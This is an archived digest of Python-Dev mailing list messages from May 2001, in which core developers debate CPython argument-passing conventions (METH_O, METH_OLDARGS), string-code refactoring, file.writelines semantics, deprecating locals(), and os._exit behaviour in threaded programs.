From tim.one at home.com  Mon May 28 03:42:30 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 21:42:30 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B10D758.3741AC2F@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMENEKEAA.tim.one@home.com>

[MAL]
> I guess there are three ways to "solve" this:
>
> a) mutable types don't implement the getreadbuf interface

Of the few types that implement it today, that would leave only strings
(8-bit and Unicode).  Too much machinery just for that.  Besides, I once
posted an example to c.l.py showing how to use regexps to search mmap'ed
files, so *that* must continue to work forever <wink>.

> b) the getreadbuf interface is complemented with a callback
>    interface, so the the buffer object can be notified of
>    the change

I like this best, although there's no bound on the number of buffers that
may need to be notified in case of change (i.e., the object would need to
maintain a list of buffers to be notified).

> c) calling getreadbuf on a mutable object causes this object
>    to become immutable

Even easier, core dump as soon as getreadbuf is called <wink>.

[Greg Ewing]
> I think it would be safe if:
>
> 1) it kept a reference to the underlying object, and

That much it already does.

> 2) it re-fetched the pointer and length info each time it was
>    needed, using the underlying object's buffer interface.

If after

    b = buffer(some_object)

b.__getitem__ needed to refetch the info between

    b[i]
and
    b[i+1]

I expect it would be so slow even Greg wouldn't want it anymore.


From tim.one at home.com  Mon May 28 03:52:18 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 21:52:18 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0FD023.C4588919@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGENFKEAA.tim.one@home.com>

[Tim]
> About combining strop and buffers and strings, don't forget
> unicodeobject.c:  that's got oodles of basically duplicate code too.
> /F suggested dealing with the minor differences via maintaining one
> code file that gets compiled multiple times w/ appropriate #defines.

[MAL]
> Hmm, that only saves us a few kB in source, but certainly not
> in the object files.

That's not the point.  Manually duplicated code blocks always get out of
synch, as people fix bugs in, or enhance, one of them but don't even know
about the others.  /F brought this up after I pissed away a few hours trying
to repair one of these in all places, and he noted that strop.replace() and
string.replace() are woefully inefficient anyway.

> The better idea would be making the types subclass from a generic
> abstract string object -- I just don't know how this will be
> possible with Guido's type patches. We'll just have to wait,
> I guess.

Wait for what?  If it were possible, is the chance that you'd take time to
rework unicodeobject.c to "subclass from a generic abstract string object"
greater than 0?  The chance that I would is exactly 0.


From martin at loewis.home.cs.tu-berlin.de  Mon May 28 08:36:49 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 08:36:49 +0200
Subject: [Python-Dev] Special-casing "O"
Message-ID: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>

> How is METH_O different than METH_OLDARGS? 

METH_O will raise an exception if the function is called with more
than one argument, without calling the function. METH_OLDARGS will
pass a tuple in this case.

I believe you cannot distinguish between a single tuple argument and
an invocation with multiple arguments in a METH_OLDARGS function, is
that true?

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Mon May 28 09:40:54 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 09:40:54 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
Message-ID: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>

When investigating calling conventions, I took a special look at
METH_OLDARGS occurrences. While most of them look reasonable,
file.writelines caught my attention. It has

	if (args == NULL || !PySequence_Check(args)) {
		PyErr_SetString(PyExc_TypeError,
			   "writelines() argument must be a sequence of strings");
		return NULL;
	}

Because it is a METH_OLDARGS method, you can do

f=open("/tmp/x","w")
f.writelines("foo\n","bar\n")

With my upcoming patches, I'd replace this with METH_O, making this
call illegal. Does anybody see a problem with that change in
semantics?

Regards,
Martin


From thomas at xs4all.net  Mon May 28 10:17:58 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 10:17:58 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 28, 2001 at 09:40:54AM +0200
References: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <20010528101758.K690@xs4all.nl>

On Mon, May 28, 2001 at 09:40:54AM +0200, Martin v. Loewis wrote:

> When investigating calling conventions, I took a special look at
> METH_OLDARGS occurrences. While most of them look reasonable,
> file.writelines caught my attention. It has

> 	if (args == NULL || !PySequence_Check(args)) {
> 		PyErr_SetString(PyExc_TypeError,
> 			   "writelines() argument must be a sequence of strings");
> 		return NULL;
> 	}

> Because it is a METH_OLDARGS method, you can do

> f=open("/tmp/x","w")
> f.writelines("foo\n","bar\n")

> With my upcoming patches, I'd replace this with METH_O, making this
> call illegal. Does anybody see a problem with that change in
> semantics?

Hell yeah. About the same problem as with the 'l.append("foo", "bar")'
problem in 1.5.2 -> [1.6, 2.x]. Oddly enough, this behaviour was added in
2.0, by converting a PyList_Check into a PySequence_Check:

$ python1.5
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
Traceback (innermost last):
  File "<stdin>", line 1, in ?
TypeError: writelines() requires list of strings

$ python2.0
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
>>> 

I do think we'll have to allow for this for one more release, with warnings
and all. It's extremely unlikely that anyone is using this, but changing it
without warning will definately not benifit 2.x's image wrt. stability ;P

If bugfix-releases were allowed to generate additional warnings, I'd add a
warning to 2.1.1....

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Mon May 28 11:04:51 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:04:51 +0200
Subject: [Python-Dev] strop vs. string
References: <LNBBLJKPBEHFEDALKOLCGENFKEAA.tim.one@home.com>
Message-ID: <3B1214B3.9A4C295D@lemburg.com>

Tim Peters wrote:
> 
> [Tim]
> > About combining strop and buffers and strings, don't forget
> > unicodeobject.c:  that's got oodles of basically duplicate code too.
> > /F suggested dealing with the minor differences via maintaining one
> > code file that gets compiled multiple times w/ appropriate #defines.
> 
> [MAL]
> > Hmm, that only saves us a few kB in source, but certainly not
> > in the object files.
> 
> That's not the point.  Manually duplicated code blocks always get out of
> synch, as people fix bugs in, or enhance, one of them but don't even know
> about the others.  /F brought this up after I pissed away a few hours trying
> to repair one of these in all places, and he noted that strop.replace() and
> string.replace() are woefully inefficient anyway.

Ok, so what we'd need is a bunch of generic low-level string 
operations: one set for 8-bit and one for 16-bit code. 

Looking at unicodeobject.c it seems that the section "Helpers" would
be a good start, plus perhaps a few bits from the method implementations
refactored to form a low-level string template library.

Perhaps we should move this code into
a file stringhelpers.h which then gets included by stringobject.c
and unicodeobject.c with appropriate #defines set up for
8-bit strings and for Unicode.

> > The better idea would be making the types subclass from a generic
> > abstract string object -- I just don't know how this will be
> > possible with Guido's type patches. We'll just have to wait,
> > I guess.
> 
> Wait for what?  If it were possible, is the chance that you'd take time to
> rework unicodeobject.c to "subclass from a generic abstract string object"
> greater than 0?  The chance that I would is exactly 0.

Well, that's hard to say. It would certainly be low-priority;
same for the above refactoring.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Mon May 28 11:19:16 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:19:16 +0200
Subject: [Python-Dev] Special-casing "O"
References: <LNBBLJKPBEHFEDALKOLCIENAKEAA.tim.one@home.com>
Message-ID: <3B121814.E5E9896A@lemburg.com>

Tim Peters wrote:
> 
> [Thomas Wouters]
> > And don't forget the method-specific errormessage by passing ':len' in
> > the format string. Of course, this can easily be (and probably should)
> > done by passing another argument to whatever parses arguments in
> > METH_O, rather than invoking string parsing magic every call.
> 
> Martin's patch automatically inserts the name of the function in the
> TypeError it raises when a METH_O call doesn't get exactly one argument, or
> gets a (one or more) keyword argument.
> 
> Stick to METH_O and it's a clear win, even in this respect:  there's no info
> in an explicit ":len" he's not already deducing, and almost all instances of
> "O:name" formats today are exactly the same this way:
> 
> if (!PyArg_ParseTuple(args, "O:abs", &v))
> if (!PyArg_ParseTuple(args, "O:callable", &v))
> if (!PyArg_ParseTuple(args, "O:id", &v))
> if (!PyArg_ParseTuple(args, "O:hash", &v))
> if (!PyArg_ParseTuple(args, "O:hex", &v))
> if (!PyArg_ParseTuple(args, "O:float", &v))
> if (!PyArg_ParseTuple(args, "O:len", &v))
> if (!PyArg_ParseTuple(args, "O:list", &v))
> else if (!PyArg_ParseTuple(args, "O:min/max", &v))
> if (!PyArg_ParseTuple(args, "O:oct", &v))
> if (!PyArg_ParseTuple(args, "O:ord", &obj))
> if (!PyArg_ParseTuple(args, "O:reload", &v))
> if (!PyArg_ParseTuple(args, "O:repr", &v))
> if (!PyArg_ParseTuple(args, "O:str", &v))
> if (!PyArg_ParseTuple(args, "O:tuple", &v))
> if (!PyArg_ParseTuple(args, "O:type", &v))
> 
> Those are all the ones in bltinmodule.c, and nearly all of them are called
> extremely frequently in *some* programs.  The only oddball is min/max, but
> then it supports more than one call-list format and so isn't a METH_O
> candidate anyway.  Indeed, Martin's patch gives a *better* message than we
> get for some mistakes today:
> 
> >>> len(val=2)
> Yraceback (most recent call last):
>  File "<stdin>", line 1, in ?
> TypeError: len() takes exactly 1 argument (0 given)
> >>>
> 
> Martin's would say
> 
>     TypeError: len takes no keyword arguments
> 
> in this case.  He should add "()" after the function name.  He should also
> throw away the half of the patch complicating and slowing METH_O to get some
> theoretical speedup in other cases:  make the one-arg builtins fly just as
> fast as humanly possible.

If we end up only optimizing the re.match("O+") case, we wouldn't need 
the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick
and Martin could call the underlying API with one or more PyObject*
taken directly from the Python VM stack.

In that case, please consider at least supporting "O", "OO" and "OOO"
with optional arguments treated like I suggested in an earlier
posting (simply pass NULL and let the API take care of assigning
a default value).

This would take care of most builtins:

Python/bltinmodule.c:
--      if (!PyArg_ParseTuple(args, "OO:filter", &func, &seq))
--      if (!PyArg_ParseTuple(args, "OO:cmp", &a, &b))
--      if (!PyArg_ParseTuple(args, "OO:coerce", &v, &w))
--      if (!PyArg_ParseTuple(args, "OO:divmod", &v, &w))
--      if (!PyArg_ParseTuple(args, "OO|O:getattr", &v, &name, &dflt))
--      if (!PyArg_ParseTuple(args, "OO:hasattr", &v, &name))
--      if (!PyArg_ParseTuple(args, "OOO:setattr", &v, &name, &value))
--      if (!PyArg_ParseTuple(args, "OO:delattr", &v, &name))
--      if (!PyArg_ParseTuple(args, "OO|O:pow", &v, &w, &z))
--      if (!PyArg_ParseTuple(args, "OO|O:reduce", &func, &seq, &result))
--      if (!PyArg_ParseTuple(args, "OO:isinstance", &inst, &cls))
--      if (!PyArg_ParseTuple(args, "OO:issubclass", &derived, &cls))
--      if (!PyArg_ParseTuple(args, "O:abs", &v))
--      if (!PyArg_ParseTuple(args, "O|OO:apply", &func, &alist, &kwdict))
--      if (!PyArg_ParseTuple(args, "O:callable", &v))
--      if (!PyArg_ParseTuple(args, "O|O:complex", &r, &i))
--      if (!PyArg_ParseTuple(args, "O:id", &v))
--      if (!PyArg_ParseTuple(args, "O:hash", &v))
--      if (!PyArg_ParseTuple(args, "O:hex", &v))
--      if (!PyArg_ParseTuple(args, "O:float", &v))
--      if (!PyArg_ParseTuple(args, "O|O:iter", &v, &w))
--      if (!PyArg_ParseTuple(args, "O:len", &v))
--      if (!PyArg_ParseTuple(args, "O:list", &v))
--      if (!PyArg_ParseTuple(args, "O|OO:slice", &start, &stop, &step))
--      else if (!PyArg_ParseTuple(args, "O:min/max", &v))
--      if (!PyArg_ParseTuple(args, "O:oct", &v))
--      if (!PyArg_ParseTuple(args, "O:ord", &obj))
--      if (!PyArg_ParseTuple(args, "O:reload", &v))
--      if (!PyArg_ParseTuple(args, "O:repr", &v))
--      if (!PyArg_ParseTuple(args, "O:str", &v))
--      if (!PyArg_ParseTuple(args, "O:tuple", &v))
--      if (!PyArg_ParseTuple(args, "O:type", &v))

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jeremy at digicool.com  Mon May 28 18:45:27 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Mon, 28 May 2001 12:45:27 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
References: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: <15122.32935.53414.174221@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis <martin at loewis.home.cs.tu-berlin.de> writes:

  >> How is METH_O different than METH_OLDARGS?

  MvL> METH_O will raise an exception if the function is called with
  MvL> more than one argument, without calling the
  MvL> function. METH_OLDARGS will pass a tuple in this case.

Yes, I see that now.  I'm +1 on METH_O, then.

Jeremy


From tim.one at home.com  Mon May 28 19:23:47 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 13:23:47 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEONKEAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> I believe you cannot distinguish between a single tuple argument and
> an invocation with multiple arguments in a METH_OLDARGS function, is
> that true?

That's the conclusion I reached after staring at the code..


From fdrake at acm.org  Mon May 28 20:20:01 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Mon, 28 May 2001 14:20:01 -0400 (EDT)
Subject: [Python-Dev] Removing doc/howto on python.org
In-Reply-To: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us>
References: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us>
Message-ID: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>

Andrew Kuchling writes:
 > Looking at a bug report Fred forwarded, I realized that after
 > py-howto.sourceforge.net was set up, www.python.org/doc/howto was
 > never changed to redirect to the SF site instead.  As of this
 > afternoon, that's now done; links on www.python.org have been updated,
 > and I've added the redirect.
 > 
 > Question: is it worth blowing away the doc/howto/ tree now, or should
 > it just be left there, inaccessible, until work on www.python.org
 > resumes?

Andrew,
  It looks like I never replied to this.  It's probably dropped off
your radar, but I'd say the answer is that the files on parrot should
be discarded sooner rather than later -- when we actually manage to
work on python.org we're that much more likely to have forgetten the
redirection entirely!


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Mon May 28 20:33:13 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Mon, 28 May 2001 14:33:13 -0400 (EDT)
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <001c01c0aa95$55836f60$325821c0@newmexico>
References: <LNBBLJKPBEHFEDALKOLCOEMPJEAA.tim.one@home.com>
	<200103112137.QAA13084@cj20424-a.reston1.va.home.com>
	<001c01c0aa95$55836f60$325821c0@newmexico>
Message-ID: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>

Guido wrote:
 > Actually, I intend to deprecate locals().  For now, globals() are
 > fine.  I also intend to deprecate vars(), at least in the form that is
 > equivalent to locals().

Samuele Pedroni writes:
 > That's fine for me. Will that deprecation be already active with 2.1, e.g
 > having locals() and param-less vars() raise a warning.
 > I imagine a (new) function that produce a snap-shot of the values in the
 > local,free and cell vars of a scope can do the job required for simple 
 > debugging (the copy will not allow to modify back the values), 
 > or another approach...

  Nothing has happened on this front yet.  Should I add deprecation
notes to the docummentation while Guido is on vacation, or wait to ask
him when he gets back?  Or was this matter resolved when I wasn't
paying attention?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From tim.one at home.com  Tue May 29 01:42:05 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 19:42:05 -0400
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEPMKEAA.tim.one@home.com>

[Guido]
> Actually, I intend to deprecate locals().  For now, globals() are
> fine.  I also intend to deprecate vars(), at least in the form that is
> equivalent to locals().

[Fred L. Drake, Jr.]
>   Nothing has happened on this front yet.  Should I add deprecation
> notes to the docummentation while Guido is on vacation, or wait to ask
> him when he gets back?  Or was this matter resolved when I wasn't
> paying attention?

I advise continuing to ignore it.  Nothing was resolved, and to judge from a
trial balloon I floated on c.l.py at the time, it's not a deprecation that
will be greeted with enthusiasm.  The problems range from people doing

def f(...):
     ...
     print "..." % locals()

to people mutating locals() at module level because they simply don't
understand that globals() is the same (but correct) thing to use there.

Due to the first example, and as Samuele may <wink> have already suggested,
we at least need to implement a mapping object capturing name bindings
before we can even think about deprecating locals() for real.


From tim.one at home.com  Tue May 29 02:01:33 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 20:01:33 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B1214B3.9A4C295D@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPPKEAA.tim.one@home.com>

[Tim]
> Wait for what?  If it were possible, is the chance that you'd
> take time to rework unicodeobject.c to "subclass from a generic
> abstract string object" greater than 0?  The chance that I
> would is exactly 0.

[MAL]
> Well, that's hard to say. It would certainly be low-priority;
> same for the above refactoring.

I think you must have missed this when it first came up here:  /F suggested
that *he* had a non-zero chance of implementing his suggestion.  That makes
it far closer to reality than anything that's been suggested since <wink>.


From tim.one at home.com  Tue May 29 02:42:54 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 20:42:54 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B121814.E5E9896A@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAAKFAA.tim.one@home.com>

[MAL]
> If we end up only optimizing the re.match("O+") case, we wouldn't need
> the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick
> and Martin could call the underlying API with one or more PyObject*
> taken directly from the Python VM stack.

How then does the callee know it was called with the correct # of arguments?
By adding enough pointer arguments to cover the longest possible O+ string
plus 1, then verifying that the one just beyond the last one it expects is
NULL, while the ones before that are not?  Adding another "# of arguments"
member to the method table?  Inventing METH_O, METH_OO, METH_OOO, ...?

> In that case, please consider at least supporting "O", "OO" and "OOO"
> with optional arguments treated like I suggested in an earlier
> posting (simply pass NULL and let the API take care of assigning
> a default value).
>
> This would take care of most builtins:

You don't have to convince me that cases other than plain "O" exist.  What's
missing is data in support of the idea that calls to those are relatively
frequent enough that it's a NET win to slow plain "O" in order to speed the
additional cases when they happen.  For example, it's not possible for calls
to reduce() to have a high hit rate in real life, because builtin_reduce is
a very expensive function -- there's only so many of those you can cram into
a second even if the calling overhead is 0.  OTOH, add a single branch to
the time it takes to find builtin_type and you've slowed its *total*
execution time significantly.

The implementation of METH_O alone is a pure win by any measure.  So would
be implementing METH_OO alone, or METH_OOO alone, etc.  Mix them, and they
all get slower than they could have been.  All the data we have says METH_O
is the single most important case, and that jibes with common sense, so I
believe it.

If you want to speed everything, fine, do that, but that likely requires a
preprocessing phase so that type signatures don't have to be resolved at
runtime at all.  So long as we're just looking at simple hacks, "the simpler
the better" is good advice and should rule in the absence of compelling
evidence against it.


From tim.one at home.com  Tue May 29 03:14:16 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 21:14:16 -0400
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEABKFAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> Because it is a METH_OLDARGS method, you can do
>
> f=open("/tmp/x","w")
> f.writelines("foo\n","bar\n")
>
> With my upcoming patches, I'd replace this with METH_O, making this
> call illegal. Does anybody see a problem with that change in
> semantics?

Guido won't, and if he had even a twinge of doubt, Thomas's explanation of
how this bug was introduced in 2.0 would erase it.  The list.append() docs
were arguably unclear when that brouhaha hit, but there's nothing unclear
about the file.writelines() docs.

OTOH, the file.writelines() docs still say a list is required, not "a
sequence" as the 2.0 (+ current) code actually implements.

Hmm.  Wonder whether writelines() should be generalized to allow an iterable
object?


From tim.one at home.com  Tue May 29 03:49:29 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 21:49:29 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010524045938.5228199C83@waltz.rahul.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>

[Aahz]
> (This got brought up because I experimented with os._exit() as a
> possible solution, but that GPFs on Win98SE.)

[TIm]
> Please open a bug report on that, then, with a tiny test case
> if possible.
> This worked fine on Win98SE for me just now:

[Aahz]
> Futz.  *Now* it works.  <sigh>

Now *what* works?  The test case I posted, or the original test case you
tried (which you didn't post)?

> Chalk it up to another unreproducible bug caused by an unstable Win98.

Actually doubt it -- threads are very reliable on Win98, despite that little
else is (malloc() is flaky, popen() is a nightmare, etc).

Here's a recent bug report on a Red Hot box that may be related:

http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735

I have no idea what's supposed to happen if you call os._exit from a
*spawned* thread (perhaps that's what you did too?  I did not) -- threads
are outside the scope of the C std, so I suppose it's a x-platform
crapshoot.


From greg at cosc.canterbury.ac.nz  Tue May 29 04:12:55 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 29 May 2001 14:12:55 +1200 (NZST)
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz>

"Martin v. Loewis" <martin at loewis.home.cs.tu-berlin.de>

> I took a special look at METH_OLDARGS occurrences.

Shouldn't all these be removed? I would have thought
list.append was the last one!

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Tue May 29 04:33:58 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 29 May 2001 14:33:58 +1200 (NZST)
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>
Message-ID: <200105290233.OAA01143@s454.cosc.canterbury.ac.nz>

Samuele Pedroni writes:
> I imagine a (new) function that produce a snap-shot of the values in the
> local,free and cell vars of a scope can do the job required for simple 
> debugging

I think there should be methods operating directly
on stack frames for debuggers to use.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From jepler at mail.inetnebr.com  Tue May 29 04:32:05 2001
From: jepler at mail.inetnebr.com (Jeff Epler)
Date: Mon, 28 May 2001 21:32:05 -0500
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>; from tim.one@home.com on Mon, May 28, 2001 at 09:49:29PM -0400
References: <20010524045938.5228199C83@waltz.rahul.net> <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>
Message-ID: <20010528213205.A1236@localhost.localdomain>

On Mon, May 28, 2001 at 09:49:29PM -0400, Tim Peters wrote:
> Here's a recent bug report on a Red Hot box that may be related:
> 
> http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735
> 
> I have no idea what's supposed to happen if you call os._exit from a
> *spawned* thread (perhaps that's what you did too?  I did not) -- threads
> are outside the scope of the C std, so I suppose it's a x-platform
> crapshoot.

I wrote that program after the first go-round about _exit and threads,
and when I got behavior I didn't expect, I entered it in the SF bug
tracker.

My reasoning: The documentation for _exit() says it is "used to exit the
child process after a fork()", and my model for thinking about threads
is that they're "child processes, but ...".  Thus, invoking os._exit()
in a thread made sense to me, meaning "ask the OS to destroy this thread
now, but leave my file descriptors, etc., alone for the other threads."

Your suggestion in the tracker of writing the equivalent C program is a
good one, though my suspicion (which I did not voice in the SF report)
was that perhaps the thread which called _exit() held the GIL, in which
case it was in some sense Python's fault that execution didn't continue.
In any case, I don't have the faintest idea how to program threads in
C/pthreads, so I can't write the "equivalent C program".

In fact, a traceback from the hung "sleep(1)" thread shows

(gdb) where
#0  0x4008c656 in __sigsuspend (set=0xbffff5b0) at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x4002ee39 in __pthread_wait_for_restart_signal (self=0x400387c0) at pthread.c:934
#2  0x4002b05c in pthread_cond_wait (cond=0x80cf5cc, mutex=0x80cf5d8) at restart.h:34
#3  0x08067ba0 in PyThread_acquire_lock () at eval.c:41
#4  0x08051ff1 in PyEval_RestoreThread () at eval.c:41
#5  0x40019ef9 in floatsleep () at eval.c:41
#6  0x400193fd in time_sleep () at eval.c:41
[...]

While those line numbers look a little fishy (eval.c:41 for all three
frames?), I think this might support my supposition.

Of course, if os._exit() has no intended use in a threaded program, then
this behavior is as good as any.  <wink>

Jeff


From tim.one at home.com  Tue May 29 06:03:38 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 00:03:38 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010528213205.A1236@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGKFAA.tim.one@home.com>

[Jeff Epler, on
 http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735
]
> My reasoning: The documentation for _exit() says it is "used to exit the
> child process after a fork()", and my model for thinking about threads
> is that they're "child processes, but ...".  Thus, invoking os._exit()
> in a thread made sense to me, meaning "ask the OS to destroy this thread
> now, but leave my file descriptors, etc., alone for the other threads."

You need a Linux expert to address this.  Threads and processes are
different beasts under most flavors of Unix, but Linux confuses them; I've
no idea how _exit() is supposed to work there, and that's why I asked (in
the bug report) what the Linux docs say about that (_exit() is supplied by
your local C library; Python just wraps it).

If what you really wanted was just to abort the thread, use thread.exit()
(aee the thread docs).  os._exit() is a dangerous thing even in the best of
conditions; unsure why the Python docs suggest using it.

> Your suggestion in the tracker of writing the equivalent C program is a
> good one, though my suspicion (which I did not voice in the SF report)
> was that perhaps the thread which called _exit() held the GIL, in which
> case it was in some sense Python's fault that execution didn't continue.

Ah, makes sense!  Yes, I bet that's what's happening.  If so, there's
nothing Python can do about it:  I'm afraid you did it to yourself.  _exit()
specifically asks that no cleanup processing be done, and when Python calls
it Python never regains control.  If you had done an actual fork, fine, the
*process* doing the _exit() would never come back to Python, but the GIL in
that process has nothing to do with the GIL in the parent process.  But
threads share the same GIL, and if you _exit() from a thread holding the GIL
then no other thread can ever run again.

Looks like it's also platform-dependent:  on Windows, _exit() kills the
process and every thread ever spawned by that process.  Since C doesn't say
anything about threads, that can't be called right or wrong.  Looks like on
Linux _exit() only kills the thread that calls it.

> ...
> Of course, if os._exit() has no intended use in a threaded program,

Right, it wasn't -- unless your program panics and wants to get out ASAP no
matter what the consequences.

> then this behavior is as good as any.  <wink>

And better than most <heh>.


From tim.one at home.com  Tue May 29 06:16:46 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 00:16:46 -0400
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAHKFAA.tim.one@home.com>

[Martin]
> I took a special look at METH_OLDARGS occurrences.

[GregE]
> Shouldn't all these be removed? I would have thought
> list.append was the last one!

I count 42 of them remaining, usually for 0-argument functions.
METH_OLDARGS is faster than METH_VARARGS in that case, and the callee can
distinguish between "called with nothing" and "called with something" under
OLDARGS.  However, they don't appear to catch keyword args:

>>> {}.clear(2)  # complains
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: function takes no arguments
>>> {}.clear(val=12, hohoho=666)  # accepts nonsense silently
>>>

the-more-you-look-the-messier-it-gets-ly y'rs  - tim


From tim.one at home.com  Tue May 29 08:06:19 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 02:06:19 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEAMKFAA.tim.one@home.com>

ESR> Apparently the Universe is an even more random place than I
ESR> thought.

[Barry A. Warsaw]
> here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs,

That's what Einstein believed (i.e., that it isn't truly random).
Unfortunately, according to another recent thread, Einstein was afraid to
use equations because he didn't want to cut Stephen Hawking's editor's penis
in half -- or something like that.  Whichever, consensus still holds that
Einstein lost this one.

i'd-take-time-to-prove-him-right-but-there's-some-mangled-whitespace-
    crying-for-help-ly y'rs  - tim


From tim.one at home.com  Tue May 29 08:15:07 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 29 May 2001 02:15:07 -0400
Subject: [Python-Dev] RE: What happened to Idle's extend.py?
In-Reply-To: <f9b3eae9.0105231419.7d093237@posting.google.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEANKFAA.tim.one@home.com>

Guido's on vacation.  Anyone have an answer for this?  I don't, and can't
make time to dig into now.

